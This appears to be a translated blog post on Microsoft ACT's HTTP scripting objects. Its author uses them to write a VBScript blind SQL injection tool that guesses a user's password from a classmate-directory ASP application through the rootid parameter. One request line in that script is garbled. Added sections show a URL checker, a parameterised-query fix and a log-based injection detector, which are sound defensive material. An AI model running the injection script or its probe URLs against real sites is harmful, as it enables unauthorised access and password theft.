Yesterday, while poking around on my machine, I accidentally opened a VBS script and noticed a call I had never seen before: Test.SendRequest("http://" & g_sServer & "/testfiles/browser.asp"). I did not recognise the object, but the meaning was clear: it sends an HTTP request. At first I thought it was something from the WMI scripting API, but I could not find the statement that created the object. The script turned out to belong to Microsoft ACT (Application Center Test), the web-site testing tool that ships with Visual Studio .NET. I had opened ACT before but never studied how to use it, so I opened its help file (on my machine it is in MSDN at ms-help://MS.VSCC/MS.MSDNVS.2052/Act/htm/actml_main.htm) and skimmed it. Roughly speaking, it is a set of HTTP client objects (I am not sure that description is precise). Listing the objects and their members makes it clear. Below is the Test object model; there is also an Application object model. For an in-depth understanding see MSDN, I am still learning myself:
-Connection object
    Close method
    Send method
    IsOpen property
    Port property
    RedirectDepth property
    Server property
    UseSSL property
-Cookie object // Because this is a site-testing tool that uses scripts to simulate many users, this object sets each user's cookies; it can also be used for a bit of tampering, heh
    Expires property
    Name property
    Path property
    Value property
-Cookies object
    Add method
    Remove method
    RemoveAll method
    Count property
    Item property
-Header object
    Name property
    Value property
-Request object
    Body property
    CodePage property
    EncodeBody property
    EncodeQueryAsUTF8 property
    Headers property
    HTTPVersion property
    Path property
    ResponseBufferSize property
    Verb property
-Response object
    Body property // Gets the body of the HTTP response. Returns only the body part of the response buffer.
    CodePage property
    BytesRecv property
    BytesSent property
    ContentLength property
    Headers property
    HeaderSize property
    HTTPVersion property
    Path property
    Port property
    ResultCode property // the HTTP status code
    Server property
    TTFB property
    TTLB property
    UseSSL property
-Test object
    CreateConnection method
    CreateRequest method
    GetCurrentUser method
    GetGlobalIndex method
    GetGlobalVariable method
    GetNextUser method
    IncrementGlobalIndex method
    SendRequest method
    SetGlobalIndex method
    SetGlobalVariable method
    Sleep method
    Trace method
    TraceLevel property
-User object
    Cookies property
    Name property
    Password property
By now you can probably think of many uses: testing sites, testing servers, testing programs, forging cookies... use your imagination. The first thing I thought of was that opening line, Test.SendRequest("http://" & g_sServer & "/testfiles/browser.asp"). The SendRequest method is described as:
oResponse = Test.SendRequest(strUrl)
Parameter: strUrl As String: the URL to request
Return value: oResponse As Response: the object representing the web server's response to the request (that is, the Response object listed above)
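To show how SendRequest and the Response members listed above are used from an ordinary WSH script, here is an added example (not code from the original post or from ACT's own samples). It checks each URL given on the command line and reports the status code, size and timing that ACT measured. It assumes ACT is installed, as the post notes it must be, and that act.test can be created from cscript exactly as the post does:

```vbscript
' Added example, not from the original post: the ACT Test object used as a
' plain HTTP client to check one or more URLs and report what came back.
Option Explicit
On Error Resume Next

Dim test, i, url, oResponse, failures
Set test = CreateObject("act.test")
If Err.Number <> 0 Then
    WScript.Echo "Cannot create act.test (is ACT installed?): " & Err.Description
    WScript.Quit 1
End If

If WScript.Arguments.Count = 0 Then
    WScript.Echo "usage: cscript check.vbs <url> [<url> ...]"
    WScript.Quit 1
End If

failures = 0
For i = 0 To WScript.Arguments.Count - 1
    url = WScript.Arguments(i)
    Err.Clear
    ' SendRequest returns a Response object; a connection-level failure
    ' (name lookup, refused connection, timeout) raises a script error instead
    Set oResponse = test.SendRequest(url)
    If Err.Number <> 0 Then
        WScript.Echo url & " -> request failed: " & Err.Description
        failures = failures + 1
    Else
        ' ResultCode is the HTTP status; TTFB/TTLB are time to first/last byte as ACT reports them
        WScript.Echo url & " -> HTTP " & oResponse.ResultCode & _
            ", " & oResponse.BytesRecv & " bytes received" & _
            ", Content-Length " & oResponse.ContentLength & _
            ", TTFB " & oResponse.TTFB & ", TTLB " & oResponse.TTLB
        ' anything outside 2xx counts as a failed check
        If oResponse.ResultCode < 200 Or oResponse.ResultCode >= 300 Then
            failures = failures + 1
        End If
    End If
Next

' Exit with the number of failed checks so the script can run from a scheduler
WScript.Quit failures
```

Run it as `cscript check.vbs http://server/page.asp` and feed the exit code to whatever scheduled it; the point of the On Error Resume Next / Err.Number pairing is that one unreachable host does not abort the remaining checks.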
This object lets us write an attack program against port 80 quite easily, something like the snow tool, or the SQL injection that is popular right now. The SQL injection programs on the net are mostly written in Perl; I cannot write them in C, and a complete socket program is fairly cumbersome. This object makes it possible in VBS, and the program is quite simple. It sacrifices efficiency, but for rookies like us it is a good approach. Let me use an example to explain. The Windy Moon classmate directory is a free ASP classmate-directory program. You may never have heard of it, but among free classmate-directory web programs it has a lot of users, so many sites run it (I have seen that my high school classmates' site was rewritten from this program). I have V1.60 in hand, downloaded from the net; while writing this post I could not get the latest version. Anyway, it is just an example, so let's use it, heh. Reading the code, I found many places that can be injected. The most obvious one (because it is visible from the home page) is the message board in the form of its forum, showThread.asp:
...
TopicID = Request("rootid")
SQL = "SELECT TopicID, Hits FROM bbs WHERE parentid = 0 AND bbsid = " & TopicID
Set RS = Conn.Execute(SQL)
...
A very old and classic one, heh. I tried:
http://192.168.101.16/txl/showthrea..d=7 and 1=1
http://192.168.101.16/txl/showthrea..d=7 and 1=2
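The defect is that rootid goes straight from the request into the SQL text, so "7 and 1=1" becomes part of the WHERE clause. The same query written defensively, as an added example that is not the Windy Moon program's own code (it assumes Conn is the open ADODB.Connection the original snippet uses and keeps the original table and column names):

```vbscript
<%
' Added example, not the program's own code. Conn is assumed to be the open
' ADODB.Connection used by the original showThread.asp.
Option Explicit
Dim rootId, re, cmd, rs

' rootid is only ever a topic number, so refuse anything that is not a
' short string of digits. "7 and 1=1" fails this test immediately.
rootId = Request("rootid")
Set re = New RegExp
re.Pattern = "^[0-9]{1,9}$"
If Not re.Test(rootId) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid rootid"
    Response.End
End If

' Pass the value as a bound parameter instead of concatenating it into the
' SQL text, so whatever the client sends can never become part of the
' statement. ADO fills the "?" placeholder from the parameter.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = Conn
cmd.CommandText = "SELECT TopicID, Hits FROM bbs WHERE parentid = 0 AND bbsid = ?"
cmd.CommandType = 1   ' adCmdText
' adInteger = 3, adParamInput = 1; the size argument is not needed for integers
cmd.Parameters.Append cmd.CreateParameter("bbsid", 3, 1, , CLng(rootId))
Set rs = cmd.Execute
' ... use rs exactly as the original code used RS ...
%>
```

Either defence alone closes this particular hole; together they also mean the "and 1=1" / "and 1=2" pair of requests returns a 400 for both, so there is no page difference left to compare.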
I know that usernames can also be seen in the user list, so this example demonstrates guessing the password. What, too simple? It is just an example, don't laugh; it was not all smooth sailing either. The code is written very poorly: in particular, once a probe has succeeded it should exit the loop, but I can't think of how to quit (BREAK? EXIT?), so the program tries the full character set for every password position. Guessing one 6-character password takes about 15 seconds; with improvements it would speed up a lot, but the efficiency can never match Perl.
To use this object you have to install Microsoft ACT, which is a tool in Visual Studio .NET. I tried registering it directly with regsvr32 on another machine and it failed, so it still has to be installed.
'***************************************************
'Windy Moon Classmate Directory V1.60 Vulnerability Test Script By Luoluo
'Note: needs the ACT tool from Visual Studio .NET
'***************************************************
Option Explicit
On Error Resume Next
Dim test
Dim o_response
Dim WRONG
Dim i, j, k
Dim PWD_LEN
Dim PWD
Dim Strings
Dim Username
'Get the username to crack from the command line
If WScript.Arguments.Count > 0 Then
    Username = WScript.Arguments(0)
Else
    Username = "luoluo"
End If
WScript.Echo "Starting detection, please wait..."
'The marker of the correct page; this is easy to find, since it only has to be in the part that differs between the two pages.
WRONG = "LuoluoisAnesehacker"
'Holds the password
PWD = ""
'Character range of the password
Strings = "0123456789abcdefghijklmnopqrstuvwxyz"
'Create the object
Set test = CreateObject("act.test")
'Get the length of the user's password
For i = 0 To 128 Step 1
    'Send a request; a Response object comes back. The address is long, so it could be built in pieces to look nicer.
Set o_response = Test.sendRequest ("& I &" '% 20and% 20Userid =' "& username &") ")
    'If the returned page contains the correct-page marker, the guess is right.
    If InStr(o_response.Body, WRONG) <> 0 Then
        PWD_LEN = i
    End If
Next
'Guess the user's password
For j = 1 To PWD_LEN Step 1
    For k = 1 To Len(Strings) Step 1
        Set o_response = Test.SendRequest("http://192.168.101.16/txl/showthread.asp?rootid=7 and exists (select Userid From student where LEFT(Userpwd, " & j & ") = '" & PWD & Mid(Strings, k, 1) & "'%20And%20Userid='" & Username & "')")
        If InStr(o_response.Body, WRONG) <> 0 Then
            PWD = PWD & Mid(Strings, k, 1)
        End If
    Next
Next
If Err Then
    WScript.Echo "Error: " & Err.Description
    Err.Clear
Else
    'Output the password
    WScript.Echo "Password: " & PWD
End If
Set test = Nothing
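Seen from the server, the guessing loop above leaves a very recognisable trail: one request per candidate length and one per candidate character, all from the same client, each carrying SQL keywords after a parameter that should only ever be a number. As an added example (not from the post), here is a WSH script that scans IIS W3C log lines for that pattern and counts probes per client. The log lines are constructed for the example and reuse the probe strings from the post; the alert threshold and the field order (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) are assumptions to adjust to your own log format:

```vbscript
' Added example, not from the original post: detect boolean-based SQL
' injection probing of a numeric parameter in IIS W3C log lines.
Option Explicit
' The character-by-character guessing above needs dozens of requests per
' password; 3 probes from one client is a conservative alert point (assumption).
Const THRESHOLD = 3

' Constructed sample log lines: fields are
' date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
Dim logLines
logLines = Array( _
    "2003-05-01 12:00:01 192.168.101.50 GET /txl/showthread.asp rootid=7 200", _
    "2003-05-01 12:00:02 192.168.101.50 GET /txl/showthread.asp rootid=7+and+1=1 200", _
    "2003-05-01 12:00:03 192.168.101.50 GET /txl/showthread.asp rootid=7+and+1=2 200", _
    "2003-05-01 12:00:04 192.168.101.50 GET /txl/showthread.asp rootid=7+and+exists(select+Userid+from+student+where+len(Userpwd)=6+and+Userid='luoluo') 200", _
    "2003-05-01 12:00:05 192.168.101.50 GET /txl/showthread.asp rootid=7+and+exists(select+Userid+from+student+where+left(Userpwd,1)='a'+and+Userid='luoluo') 200", _
    "2003-05-01 12:00:06 192.168.101.77 GET /txl/showthread.asp rootid=12 200", _
    "2003-05-01 12:00:07 192.168.101.77 GET /txl/index.asp - 200" _
)

Dim reBoolean, reSqlFunc
' a numeric parameter value followed by a boolean operator: "rootid=7 and ..."
Set reBoolean = New RegExp
reBoolean.IgnoreCase = True
reBoolean.Pattern = "=[0-9]+ +(and|or) "
' SQL functions and keywords that a numeric id parameter never legitimately contains
Set reSqlFunc = New RegExp
reSqlFunc.IgnoreCase = True
reSqlFunc.Pattern = "\b(exists|select|left|len|substring)\s*\("

' Undo the URL encoding IIS leaves in cs-uri-query (enough for this pattern)
Function DecodeQuery(q)
    Dim s
    s = Replace(q, "+", " ")
    s = Replace(s, "%20", " ")
    s = Replace(s, "%27", "'")
    s = Replace(s, "%28", "(")
    s = Replace(s, "%29", ")")
    DecodeQuery = s
End Function

Function IsProbe(query)
    Dim q
    q = DecodeQuery(query)
    IsProbe = reBoolean.Test(q) Or reSqlFunc.Test(q)
End Function

Dim hitsPerClient, line, fields, ip, query, client
Set hitsPerClient = CreateObject("Scripting.Dictionary")
For Each line In logLines
    fields = Split(line, " ")
    ip = fields(2)
    query = fields(5)
    If IsProbe(query) Then
        If Not hitsPerClient.Exists(ip) Then hitsPerClient.Add ip, 0
        hitsPerClient(ip) = hitsPerClient(ip) + 1
        WScript.Echo "probe from " & ip & " at " & fields(1) & ": " & fields(4) & "?" & DecodeQuery(query)
    End If
Next

' With the sample above, 192.168.101.50 is reported with 4 probes; .77 is not
For Each client In hitsPerClient.Keys
    If hitsPerClient(client) >= THRESHOLD Then
        WScript.Echo "ALERT: " & client & " sent " & hitsPerClient(client) & _
            " injection probes (blind enumeration pattern)"
    End If
Next
```

The two regular expressions deliberately stay narrow (an operator directly after a number, or a SQL function call) so that ordinary text in other parameters does not trip them; the per-client count is what separates a single odd request from the request-per-character loop in the script above. To run it over a real log, replace the logLines array with lines read from the file and keep the same field split.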